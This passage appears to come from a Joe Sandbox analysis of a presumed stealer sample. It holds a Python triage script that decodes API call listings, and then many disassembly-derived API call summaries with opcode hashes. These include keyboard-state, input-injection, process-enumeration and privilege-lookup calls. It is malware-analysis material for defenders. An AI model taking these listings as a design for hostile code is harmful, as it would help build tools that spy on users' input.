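# Dynamically resolved names worth flagging during triage, with the reason.
NOTEWORTHY_PROCS = {
    "GetSystemWow64DirectoryW": "probe for a 64-bit (WOW64-capable) OS",
}

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>#?\w+)\.(?P<module>\w+)(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    module: str
    name: str
    args: List[str]
    ref: str
    parent: Optional[str] = None
    decoded: Dict[str, str] = field(default_factory=dict)
    notes: List[str] = field(default_factory=list)


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet such as 'socket.WSOCK32(00000002,...), ref: 00961AFD'."""
    m = LINE_RE.match(line)
    if not m:
        return None
    name, module = m["name"], m["module"].upper()
    if name.startswith("#") and module == "WSOCK32":
        # Ordinal import: map back to the export name when the table knows it.
        name = WSOCK32_ORDINALS.get(int(name[1:]), name)
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return ApiCall(module, name, args, m["ref"].upper(), m["parent"])


def _as_int(token: str) -> Optional[int]:
    try:
        return int(token, 16)
    except ValueError:
        return None  # '?' (unknown at analysis time) or a string literal


def decode_call(call: ApiCall) -> ApiCall:
    """Fill call.decoded with symbolic argument values and call.notes with triage hints."""
    for (arg_name, table), token in zip(ARG_DECODERS.get((call.module, call.name), []), call.args):
        value = _as_int(token)
        call.decoded[arg_name] = table[value] if table and value in table else token
    if call.name == "GetProcAddress":
        for token in call.args:
            if token in NOTEWORTHY_PROCS:
                call.notes.append(f"GetProcAddress({token}): {NOTEWORTHY_PROCS[token]}")
    return call


def triage(lines: List[str]) -> List[ApiCall]:
    """Parse and decode every API bullet; headings and other lines are skipped."""
    calls = [parse_api_line(line) for line in lines]
    return [decode_call(c) for c in calls if c is not None]


# Constructed input: API bullets copied from the function listings on this page.
SAMPLE_LINES = [
    "• socket.WSOCK32(00000002,00000002,00000011), ref: 00961AFD",
    "• WSAGetLastError.WSOCK32 ref: 00961B0B",
    "• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00961B8A",
    "• GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0093D3BF",
    "  • Part of subcall function 00942DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4",
]

if __name__ == "__main__":
    for c in triage(SAMPLE_LINES):
        where = f" (in subcall {c.parent})" if c.parent else ""
        print(f"{c.ref} {c.module}!{c.name}{where} {c.decoded} {c.notes}")
```

Run it over the copied bullets and the UDP function reads as `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)` followed by `setsockopt(s, SOL_SOCKET, SO_BROADCAST, &val, 4)`, which is what you would expect from a UDP-open routine with a broadcast option rather than from the stealer payload itself; extending `ARG_DECODERS` and `NOTEWORTHY_PROCS` is how you would cover the other listings (for instance flagging `CreateHardLinkW` or the `MultiByteToWideChar` code-page argument).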
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                    • Instruction ID: 9d3145677659bca4cd52a5085324674074f963cae57e7d1794f7c68c536ba48d
                                                                    • Opcode Fuzzy Hash: 58bba937667f69e834bffe38574f8391edf13e5b4d3da64c8287ba8adb51399e
                                                                    • Instruction Fuzzy Hash: 0D410871B00318AFD724AF78CC41BAABBEAEBC8710F10852EF156DB6D1D77199918790
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00955783
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 009557A9
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009557CE
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009557FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                    • Instruction ID: 21e83da1695cfd5f498cde62c5b9eb4f9271431bd57f210d2cce71045818fa54
                                                                    • Opcode Fuzzy Hash: 3ad9a2523867e59c2c60a6a0896506ace67c3628a291241bd61a1241aff81c00
                                                                    • Instruction Fuzzy Hash: 7C412D35600A50DFCB11DF1AC444A1EBBE5FF89321B198488ED5A9B362CB34FD45CB91
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00906D71,00000000,00000000,009082D9,?,009082D9,?,00000001,00906D71,8BE85006,00000001,009082D9,009082D9), ref: 0091D910
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0091D999
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0091D9AB
                                                                    • __freea.LIBCMT ref: 0091D9B4
                                                                      • Part of subcall function 00913820: RtlAllocateHeap.NTDLL(00000000,?,009B1444,?,008FFDF5,?,?,008EA976,00000010,009B1440,008E13FC,?,008E13C6,?,008E1129), ref: 00913852
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                    • Instruction ID: c30ff670d3e7fec24622388258bba52c394b7fd1418eec9d5e3f7d959e8db187
                                                                    • Opcode Fuzzy Hash: 0c48abd95cf552bcb5e718d5e18b60ab45ace04d88d810477af643eace62501c
                                                                    • Instruction Fuzzy Hash: 3A31AD72B1221AABDF249F65DC45EEE7BA9EB41710B054168FC04D6290EB35DD90CBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00975352
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00975375
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00975382
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009753A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                    • String ID:
                                                                    • API String ID: 3340791633-0
                                                                    • Opcode ID: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                    • Instruction ID: 709dca058d738d3262a8f41ff499b206a5cf2450fd416bf531b8640dc12ac0ba
                                                                    • Opcode Fuzzy Hash: 41365cf2628503d12793a1f55a192cc0e82ca2b0ff640502661941349242ebfc
                                                                    • Instruction Fuzzy Hash: BF31E432B55A08EFEB749A14CC56BE83769AB043D0F598505FA18961F0C7F5AD80EB41
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0094ABF1
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 0094AC0D
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 0094AC74
                                                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0094ACC6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                    • Instruction ID: b59e71ed9ee1e18c2cb82873712a14425da008cc925beccc842d42b44cb6cf40
                                                                    • Opcode Fuzzy Hash: 036213c1031dfdddbf7a0a59a3837537220e30a1586b0d6c6ce2e820f7581468
                                                                    • Instruction Fuzzy Hash: EB313570A84319AFEF34CB658C84FFE7BA9AB89312F04471AE4C5931D0C3798D819792
                                                                    APIs
                                                                    • ClientToScreen.USER32(?,?), ref: 0097769A
                                                                    • GetWindowRect.USER32(?,?), ref: 00977710
                                                                    • PtInRect.USER32(?,?,00978B89), ref: 00977720
                                                                    • MessageBeep.USER32(00000000), ref: 0097778C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1352109105-0
                                                                    • Opcode ID: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                    • Instruction ID: f48a8323bf33ebe074cf6054f051a75c84be3a448517bf5bf871732f5a14a93a
                                                                    • Opcode Fuzzy Hash: 2398558f3b9e71276d817cd3f5b2c66853d143082f007aee5cbaf8581401d097
                                                                    • Instruction Fuzzy Hash: 8741AD36609255EFCB09CF98D894EA9B7F5FB49314F1481A8E418DB261C330A941DF90
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 009716EB
                                                                      • Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
                                                                      • Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
                                                                      • Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65
                                                                    • GetCaretPos.USER32(?), ref: 009716FF
                                                                    • ClientToScreen.USER32(00000000,?), ref: 0097174C
                                                                    • GetForegroundWindow.USER32 ref: 00971752
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                    • Instruction ID: 91bd04c14affa14c1718ffaa3ed09077244aa6040641703d36e92ec6fcffcfe0
                                                                    • Opcode Fuzzy Hash: 7cd6a3dd966574fb99a64b82a545b779eb080a4328275a09736ce879dfee0c08
                                                                    • Instruction Fuzzy Hash: 41313072D00149AFC704DFAAC881DAEB7FDFF49304B548069E415E7211EA31DE45CBA1
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0094D501
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0094D50F
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0094D52F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0094D5DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 420147892-0
                                                                    • Opcode ID: 9790c1f98fd15a3f75b04fef56ae26e511b5d2089e8c11c405d62effe8b31196
                                                                    • Instruction ID: 2061983c3a9cb624577068aae2c3461ab83a0aa378723831d8c5fe8342693896
                                                                    • Opcode Fuzzy Hash: 9790c1f98fd15a3f75b04fef56ae26e511b5d2089e8c11c405d62effe8b31196
                                                                    • Instruction Fuzzy Hash: FF317E721082409FD304EF54C881EAFBBE8FF9A354F54092DF585861A1EB71AA85CB93
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • GetCursorPos.USER32(?), ref: 00979001
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00937711,?,?,?,?,?), ref: 00979016
                                                                    • GetCursorPos.USER32(?), ref: 0097905E
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00937711,?,?,?), ref: 00979094
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                    • Instruction ID: a5a181798e08ac5fb962bdb22d444c5cb8e0699caccaaf92cd9bf1e41bec8d18
                                                                    • Opcode Fuzzy Hash: 3be6b526146d9996a51fa745707030d7b07a11cfbaaa98d3f00ab2a843bda33a
                                                                    • Instruction Fuzzy Hash: DA21A336621018EFDB258F94CC58EFA7BF9FF89360F048159F90987161C3319990EB60
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,0097CB68), ref: 0094D2FB
                                                                    • GetLastError.KERNEL32 ref: 0094D30A
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0094D319
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0097CB68), ref: 0094D376
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                    • Instruction ID: a58cf01a0d4179cab1835d37d15f70d14eae0d63e11986a762f76b1fcee105d4
                                                                    • Opcode Fuzzy Hash: 02367dba8aeeb4de9f63614c020dc2386e8a5009aebe2aa4b5c6806b08350064
                                                                    • Instruction Fuzzy Hash: 3B21A17550A2019F8710DF28C88186A77E8FF96368F504A5DF4A9D32A1E730DE45CB93
                                                                    APIs
                                                                       • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 0094102A
                                                                       • Part of subcall function 00941014: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00941036
                                                                       • Part of subcall function 00941014: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00941045
                                                                       • Part of subcall function 00941014: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 0094104C
                                                                       • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00941062
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009415BE
                                                                    • _memcmp.LIBVCRUNTIME ref: 009415E1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00941617
                                                                    • HeapFree.KERNEL32(00000000), ref: 0094161E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                    • Instruction ID: 26fcaa3b8d33b97adfb13a1e8b815006dcf237504a5750bdc52120595d24c009
                                                                    • Opcode Fuzzy Hash: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                    • Instruction Fuzzy Hash: 56219A72E00209EFDF04DFA4C945FEEB7B8EF84344F098459E445AB241E730AA85DBA0
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0097280A
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972824
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972832
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00972840
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                     • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                    • Instruction ID: 230b6cb9ed3c17b6e12dbbb1dd08865fce5b84de65f712e9e01a0af57042a205
                                                                    • Opcode Fuzzy Hash: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                    • Instruction Fuzzy Hash: B621B632618511AFD7149B24C845FAA7B99FF86324F14815CF42ACB6D2C776FC82C791
                                                                    APIs
                                                                      • Part of subcall function 00948D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948D8C
                                                                      • Part of subcall function 00948D7D: lstrcpyW.KERNEL32(00000000,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00948DB2
                                                                      • Part of subcall function 00948D7D: lstrcmpiW.KERNEL32(00000000,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948DE3
                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947923
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947949
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947984
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 68931104726e15f16561bf5821f93bc0f261ba7bb0a4df3fdf8807467c4c6a0b
                                                                    • Instruction ID: b9fa31bf7f25157a83a17f49247fb541627d2f41856c1c83fa24383412860a2d
                                                                    • Opcode Fuzzy Hash: 68931104726e15f16561bf5821f93bc0f261ba7bb0a4df3fdf8807467c4c6a0b
                                                                    • Instruction Fuzzy Hash: 7B11223A204346AFCB159F78C844E7BB7A9FF85390B40402AF906CB3A4EB319801D7A1
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00977D0B
                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00977D2A
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00977D42
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095B7AD,00000000), ref: 00977D6B
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID:
                                                                    • API String ID: 847901565-0
                                                                    • Opcode ID: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                    • Instruction ID: 3627afa4ac1c868c5480653976e53bc5e113838925bf1d049806bb73ebe4bc52
                                                                    • Opcode Fuzzy Hash: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                    • Instruction Fuzzy Hash: 8511D233118615AFCB208FA8DC04AA67BA8BF85370B158728F83DC72F0D7318960DB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 009756BB
                                                                    • _wcslen.LIBCMT ref: 009756CD
                                                                    • _wcslen.LIBCMT ref: 009756D8
